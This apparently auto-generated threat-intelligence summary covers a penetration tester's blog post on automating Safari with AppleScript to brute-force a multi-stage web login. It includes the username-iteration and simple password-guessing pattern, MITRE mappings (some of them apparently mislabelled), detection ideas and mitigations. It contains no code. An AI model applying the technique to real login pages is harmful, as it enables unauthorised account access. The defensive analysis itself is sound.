Full Report
A long time ago i blogged on the joys of using VBS to automate bruteforcing [1|2]when one didnt want to mess about duplicating an applications functionality at the protocol level.. Yesterday i had need to brute-force a web application which tried hard to be difficult and annoying.. Normally i would have used crowbar, Suru or a ugly mangled Python script, but the application was strangely difficult.. i.e. the login process is multi staged, with new cookies being handed out at various stages. 302 redirects are used heavily and then to top it off a healthy dose of JavaScript is sent back in replies that also affect your navigation.. Now all of this can be scripted (obviously) but i figured i would try automating Safari with applescript to get the same effect..
Analysis Summary
# Tool/Technique: AppleScript for HTTP BruteForcing
## Overview
The technique described involves leveraging **AppleScript** to automate the Safari web browser for the purpose of brute-forcing HTTP-based web application logins. This approach was utilized because the target application employed complex authentication methods, including multi-staged logins, heavy reliance on 302 redirects, and active manipulation via JavaScript responses, which made standard protocol-level brute-forcing tools cumbersome. By automating the browser itself, the attacker delegates the handling of redirects and JavaScript execution to Safari.
## Technical Details
- Type: Tool (AppleScript interacting with Safari) / Technique (Browser Automation for Brute-Forcing)
- Platform: macOS (Requires Safari application)
- Capabilities: Automates form filling, button clicking, circumvents complex web application logic (redirects, JavaScript manipulation).
- First Seen: The article was published on 01 January 2008.
## MITRE ATT&CK Mapping
This activity primarily targets the initial access and credential access phases of an attack lifecycle.
- **TA0001 - Initial Access**
- T1189 - Drive-by Compromise (Less direct, but browser interaction is key)
- **TA0006 - Credential Access**
- T1110 - Brute Force
- T1110.001 - Password Guessing: Identifier Guessing (If usernames are iterated)
- T1110.003 - Password Guessing: Password Guessing (General brute-force application)
## Functionality
### Core Capabilities
- **Browser Control:** Fires up the Safari browser application via scripting.
- **Form Interaction:** Uses JavaScript execution capabilities within the browser context to fill in login form fields.
- **Authentication Handling:** Automatically handles complex multi-staged login flows, 302 redirects, and processing of JavaScript returned by the server, which simplifies payload creation compared to scripting the HTTP protocol directly.
- **Iteration:** Iterates through lists of usernames for testing.
### Advanced Features
- **Result Capture:** Screenshots the resulting page after the login attempt and saves it based on the username tested (e.g., `~/captures/XXXX.png`).
- **Data Handling Workaround:** Implemented a workaround for dictionary/associative array functionality (which was difficult to implement natively in AppleScript) by using a simple string delimited by a colon (`:`) for storing username/password pairs at runtime.
- **Password Generation:** Generated test passwords based on simple derivation (e.g., `username+123`).
## Indicators of Compromise
As this describes a custom operational technique rather than specific malware distribution, generic indicators are provided based on the components mentioned:
- File Hashes: N/A (Custom, ephemeral script)
- File Names: The resulting captured images might be named after the tested username (XXXX.png).
- Registry Keys: N/A
- Network Indicators: Heavy outbound traffic directed towards the target web application undergoing brute-force testing.
- Behavioral Indicators: High frequency of login attempts against a specific web application endpoint, unusual pattern of browser navigation (rapid form submission followed by screenshot capture).
## Associated Threat Actors
This specific script was created by the author ("Haroon Meer" of SensePost) for a specific testing need. No known established threat actor groups are directly associated with this specific AppleScript tool, though the technique itself is common among penetration testers and adversaries alike.
## Detection Methods
- Signature-based detection: Low risk via signatures unless the specific AppleScript payload is captured.
- Behavioral detection: Monitor for automated, rapid sequence of actions involving opening third-party applications (Safari) followed by automated input submission and screen capture operations.
- YARA rules: Not applicable for detecting this specific scripting technique alone.
## Mitigation Strategies
- **Prevention:** Implement strong credential policies (rate limiting, account lockout mechanisms, CAPTCHAs, or multi-factor authentication) on web application login pages.
- **Hardening Recommendations:** Use modern web application security features that resist browser automation (e.g., checking HTTP headers, robust session management that invalidates cookies upon unexpected activity).
## Related Tools/Techniques
- **Crowbar:** Mentioned as a traditional protocol-level brute-forcing tool the author usually employs.
- **Suru:** Mentioned as another alternative tool.
- **VBScript Brute-Forcing:** Previously blogged about by the author for automating protocol-level brute-forcing without copying application functionality.
- **Selenium/Puppeteer:** Modern equivalents for browser automation used for similar penetration testing or automated testing activities.